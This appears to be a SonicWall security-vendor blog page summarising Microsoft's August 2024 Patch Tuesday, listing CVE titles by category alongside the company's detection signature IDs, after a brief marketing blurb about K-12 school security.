The integration of technology has fundamentally changed the learning landscape. These changes bring both opportunities and challenges for K-12 institutions. As schools implement hybrid and remote learning models, they face increased cybersecurity risks that demand robust, cost-effective solutions. By partnering with SonicWall and taking advantage of our comprehensive suite of security products, schools district administrators are empowered to create a continuously safe, flexible and conducive digital learning environment, ensuring that students and faculty are protected and supported no matter where they are learning from.

Learn more about SonicWall’s K-12 solutions here.

Microsoft Security Bulletin Coverage For August 2024

Overview

Microsoft’s 2024 Patch Tuesday has 87 vulnerabilities, 36 of which are Elevation of Privilege vulnerabilities. The SonicWall Capture Labs threat research team has analyzed and addressed Microsoft’s security advisories for the month of 2024 and has produced coverage for ten of the reported vulnerabilities

Vulnerabilities with Detections

 

CVE CVE Title Signature
CVE-2024-38106 Windows Kernel Elevation of Privilege Vulnerability ASPY 6995 Exploit-exe exe.MP_399
CVE-2024-38125 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability ASPY 6996 Exploit-exe exe.MP_400
CVE-2024-38141 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability ASPY 6997 Exploit-exe exe.MP_401
CVE-2024-38144 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability ASPY 6998 Exploit-exe exe.MP_402
CVE-2024-38147 Microsoft DWM Core Library Elevation of Privilege Vulnerability ASPY 6999 Exploit-exe exe.MP_403
CVE-2024-38148 Windows Secure Channel Denial of Service Vulnerability ASPY 593  Exploit-exe exe.MP_404
CVE-2024-38150 Windows DWM Core Library Elevation of Privilege Vulnerability ASPY 594  Exploit-exe exe.MP_405
CVE-2024-38178 Scripting Engine Memory Corruption Vulnerability IPS 4483  Scripting Engine Memory Corruption (CVE-2024-38178)
CVE-2024-38193 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability ASPY 595  Exploit-exe exe.MP_406
CVE-2024-38196 Windows Common Log File System Driver Elevation of Privilege Vulnerability ASPY 596  Exploit-exe exe.MP_407
CVE-2024-38063 Windows TCP/IP Remote Code Execution Vulnerability RTDMI

Release Breakdown

The vulnerabilities can be classified into following categories:

For August there are seven critical, 79 important and one moderate vulnerabilities.

2024 Patch Tuesday Monthly Comparison

Microsoft tracks vulnerabilities that are being actively exploited at the time of discovery and those that have been disclosed publicly before the patch Tuesday release for each month. The above chart displays these metrics as seen each month.

Release Detailed Breakdown

Denial of Service Vulnerabilities

CVE CVE Title
CVE-2024-38126 Windows Network Address Translation (NAT) Denial of Service Vulnerability
CVE-2024-38132 Windows Network Address Translation (NAT) Denial of Service Vulnerability
CVE-2024-38145 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
CVE-2024-38146 Windows Layer-2 Bridge Network Driver Denial of Service Vulnerability
CVE-2024-38148 Windows Secure Channel Denial of Service Vulnerability
CVE-2024-38168 .NET and Visual Studio Denial of Service Vulnerability

Elevation of Privilege Vulnerabilities

CVE CVE Title
CVE-2024-21302 Windows Secure Kernel Mode Elevation of Privilege Vulnerability
CVE-2024-29995 Windows Kerberos Elevation of Privilege Vulnerability
CVE-2024-38084 Microsoft OfficePlus Elevation of Privilege Vulnerability
CVE-2024-38098 Azure Connected Machine Agent Elevation of Privilege Vulnerability
CVE-2024-38106 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38107 Windows Power Dependency Coordinator Elevation of Privilege Vulnerability
CVE-2024-38109 Azure Health Bot Elevation of Privilege Vulnerability
CVE-2024-38117 NTFS Elevation of Privilege Vulnerability
CVE-2024-38125 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38127 Windows Hyper-V Elevation of Privilege Vulnerability
CVE-2024-38133 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38134 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38135 Windows Resilient File System (ReFS) Elevation of Privilege Vulnerability
CVE-2024-38136 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
CVE-2024-38137 Windows Resource Manager PSM Service Extension Elevation of Privilege Vulnerability
CVE-2024-38141 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2024-38142 Windows Secure Kernel Mode Elevation of Privilege Vulnerability
CVE-2024-38143 Windows WLAN AutoConfig Service Elevation of Privilege Vulnerability
CVE-2024-38144 Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability
CVE-2024-38147 Microsoft DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-38150 Windows DWM Core Library Elevation of Privilege Vulnerability
CVE-2024-38153 Windows Kernel Elevation of Privilege Vulnerability
CVE-2024-38162 Azure Connected Machine Agent Elevation of Privilege Vulnerability
CVE-2024-38163 Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-38184 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38185 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38186 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38187 Windows Kernel-Mode Driver Elevation of Privilege Vulnerability
CVE-2024-38191 Kernel Streaming Service Driver Elevation of Privilege Vulnerability
CVE-2024-38193 Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability
CVE-2024-38196 Windows Common Log File System Driver Elevation of Privilege Vulnerability
CVE-2024-38198 Windows Print Spooler Elevation of Privilege Vulnerability
CVE-2024-38201 Azure Stack Hub Elevation of Privilege Vulnerability
CVE-2024-38202 Windows Update Stack Elevation of Privilege Vulnerability
CVE-2024-38215 Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
CVE-2024-38223 Windows Initial Machine Configuration Elevation of Privilege Vulnerability

Information Disclosure Vulnerabilities

CVE CVE Title
CVE-2024-38118 Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability
CVE-2024-38122 Microsoft Local Security Authority (LSA) Server Information Disclosure Vulnerability
CVE-2024-38123 Windows Bluetooth Driver Information Disclosure Vulnerability
CVE-2024-38151 Windows Kernel Information Disclosure Vulnerability
CVE-2024-38155 Security Center Broker Information Disclosure Vulnerability
CVE-2024-38167 .NET and Visual Studio Information Disclosure Vulnerability
CVE-2024-38206 Microsoft Copilot Studio Information Disclosure Vulnerability
CVE-2024-38214 Windows Routing and Remote Access Service (RRAS) Information Disclosure Vulnerability

Remote Code Execution Vulnerabilities

CVE CVE Title
CVE-2024-38063 Windows TCP/IP Remote Code Execution Vulnerability
CVE-2024-38114 Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38115 Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38116 Windows IP Routing Management Snapin Remote Code Execution Vulnerability
CVE-2024-38120 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38121 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38128 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38130 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38131 Clipboard Virtual Channel Extension Remote Code Execution Vulnerability
CVE-2024-38138 Windows Deployment Services Remote Code Execution Vulnerability
CVE-2024-38140 Windows Reliable Multicast Transport Driver (RMCAST) Remote Code Execution Vulnerability
CVE-2024-38152 Windows OLE Remote Code Execution Vulnerability
CVE-2024-38154 Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability
CVE-2024-38157 Azure IoT SDK Remote Code Execution Vulnerability
CVE-2024-38158 Azure IoT SDK Remote Code Execution Vulnerability
CVE-2024-38159 Windows Network Virtualization Remote Code Execution Vulnerability
CVE-2024-38160 Windows Network Virtualization Remote Code Execution Vulnerability
CVE-2024-38161 Windows Mobile Broadband Driver Remote Code Execution Vulnerability
CVE-2024-38169 Microsoft Office Visio Remote Code Execution Vulnerability
CVE-2024-38170 Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-38171 Microsoft PowerPoint Remote Code Execution Vulnerability
CVE-2024-38172 Microsoft Excel Remote Code Execution Vulnerability
CVE-2024-38173 Microsoft Outlook Remote Code Execution Vulnerability
CVE-2024-38178 Scripting Engine Memory Corruption Vulnerability
CVE-2024-38180 SmartScreen Prompt Remote Code Execution Vulnerability
CVE-2024-38189 Microsoft Project Remote Code Execution Vulnerability
CVE-2024-38195 Azure CycleCloud Remote Code Execution Vulnerability
CVE-2024-38199 Windows Line Printer Daemon (LPD) Service Remote Code Execution Vulnerability

Security Feature Bypass Vulnerability

CVE CVE Title
CVE-2024-38213 Windows Mark of the Web Security Feature Bypass Vulnerability

Spoofing Vulnerabilities

CVE CVE Title
CVE-2024-37968 Windows DNS Spoofing Vulnerability
CVE-2024-38108 Azure Stack Hub Spoofing Vulnerability
CVE-2024-38166 Microsoft Dynamics 365 Cross-site Scripting Vulnerability
CVE-2024-38177 Windows App Installer Spoofing Vulnerability
CVE-2024-38197 Microsoft Teams for iOS Spoofing Vulnerability
CVE-2024-38200 Microsoft Office Spoofing Vulnerability
CVE-2024-38211 Microsoft Dynamics 365 (on-premises) Cross-site Scripting Vulnerability

Tampering Vulnerability

CVE CVE Title
CVE-2024-38165 Windows Compressed Folder Tampering Vulnerability